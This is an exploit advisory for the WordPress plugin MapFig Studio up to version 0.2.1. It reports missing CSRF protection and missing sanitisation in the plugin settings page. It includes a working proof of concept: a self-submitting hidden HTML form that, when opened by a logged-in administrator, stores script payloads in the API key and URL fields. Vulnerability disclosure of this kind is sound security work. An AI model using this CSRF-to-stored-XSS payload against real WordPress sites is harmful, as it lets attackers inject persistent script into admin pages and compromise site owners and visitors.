WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting

# Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/# Version: <= 0.2.1# Tested on: Firefox# Contact me: [email protected] plugin does not have CSRF check in some places, and is missingsanitisation as well as escaping, which could allow attackers to makelogged in admin add Stored XSS payloads via a CSRF attackProof of ConceptHave a logged in admin open a page containing:<html>  <body>    <form action="http://example.com/wp-admin/admin.php?page=studio_settings"method="POST">      <input type="hidden" name="studio_apikey"value=""><script>alert(1)</script>" />      <input type="hidden" name="studio_url"value=""><script>alert(1)</script>" />      <input type="hidden" name="save" value="Save!" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/